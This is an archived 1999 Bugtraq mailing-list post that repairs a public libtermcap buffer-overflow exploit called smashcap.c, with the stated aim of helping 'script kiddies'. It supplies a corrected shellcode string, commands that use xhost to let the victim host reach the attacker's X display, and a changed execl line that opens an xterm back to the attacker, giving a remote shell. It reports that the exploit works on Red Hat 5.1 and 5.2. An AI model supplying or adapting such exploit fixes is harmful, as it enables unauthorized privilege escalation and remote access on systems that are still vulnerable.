Bugtraq mailing list archives
libtermcap exploit fix ... smashcap.c
From: luci () WILD TRANSART RO (Hudin Lucian)
Date: Mon, 23 Aug 1999 01:18:16 +0300
Hi, since Bugtraq is a full-disclosure list, let's help the script kiddies a bit and scare the sysadmins a little bit more...

To make smashcap.c work, all you have to do is remove one 0xff character before /bin/sh in the shellcode, so the line would be:

    "\x80\xe8\xdc\xff\xff\xff/bin/sh"

instead of:

    "\x80\xe8\xdc\xff\xff\xff\xff/bin/sh"

Also, you'll have to be on a console running X to exploit it, but if you have another box where you can start X then it's OK:

    myhost$ startx; xhost +victim.com
    victim$ ./smashcap

and modify the last line of smashcap.c to:

    execl("/usr/X11R6/bin/xterm", "xterm", "-display", "victim.com:0", 0);

Well, it works on most Red Hats (tested on 5.1 and 5.2). On Slackware it SIGSEGVs; you need to work on it a little bit, sorry, I don't have a Slackware box to work on.

regards,
lucysoft